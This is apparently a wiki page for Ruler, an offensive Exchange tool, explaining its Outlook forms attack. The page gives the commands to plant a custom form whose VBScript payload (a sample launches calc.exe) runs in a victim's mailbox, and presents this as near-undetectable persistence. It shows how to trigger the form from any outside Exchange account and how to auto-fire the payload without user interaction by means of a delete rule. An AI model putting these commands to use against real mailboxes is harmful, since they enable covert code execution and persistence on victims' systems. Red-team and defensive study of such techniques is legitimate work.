-
Notifications
You must be signed in to change notification settings - Fork 359
Forms
Ruler can also get shell through custom forms. This is especially useful for persistence, as a form can lie dormant in the inbox, nearly undetectable.
The basic premise behind forms is explained in the Outlook forms and shells.
To access the Forms option, you need to use the form command. There are multiple sub-commands to forms:
If you use the forms attack, you need to ensure that the templates folder is present in the current working directory. Ruler will need the files contained in this directory. Please copy the following files into it:
- img0.bin
- img1.bin
- formstemplate.bin
- formsdeletetemplate.bin
You can view all existing forms using the display
command. This fetches the list of existing forms from the exchange server and provides you with the full form name.
./ruler --email john@msf.com form display
Unlike Rules, forms don't require a WebDAV instacnce and VBScript can be executed directly. A sample VBScript entry would be:
CreateObject("Wscript.Shell").Run "calc.exe", 0, False
The script needs to be supplied in either a file, or on the command line. To create a custom form:
./ruler --email john@msf.com form add --suffix superduper --input /tmp/command.txt --send
This will create a new form, of message class IPM.Note.superduper and use the script found in /tmp/command.txt as the VBScript to execute. Using --send
simply task Ruler to send an email to the user, using their own account, and ensuring the correct message class is set (which triggers the form).
To trigger an existing form, you don't need send the email from the account that the form was created on. This is great for persistence, you simply need to have a valid Exchange based account (outlook.com is great) and know the suffix used for the form.
./ruler --email alice@outlook.com form send --target john@msf.com --suffix superduper
Nick Landers (@monoxgas) found that a form without event triggers, would call the VBScript payload on delete. This delete can be automated by creating a client-side rule to delete the message as it arrives in the mailbox.
This is a great way to auto-trigger the form, without requiring any user interaction. Ruler can automate this for you if you supply the --rule
flag:
./ruler --email john@msf.com form add --suffix superduper --input /tmp/command.txt --rule --send
You will need to delete the newly created rule once your payload has triggered. This can be done using the delete command outlined rules.
Deleting an existing is done in a similar way to deleting rules.
./ruler --email john@msf.com form delete --suffix superduper
If the form has a rule associated with it (you used --rule
when creating the form), Ruler will detect the rule and offer to delete it for you.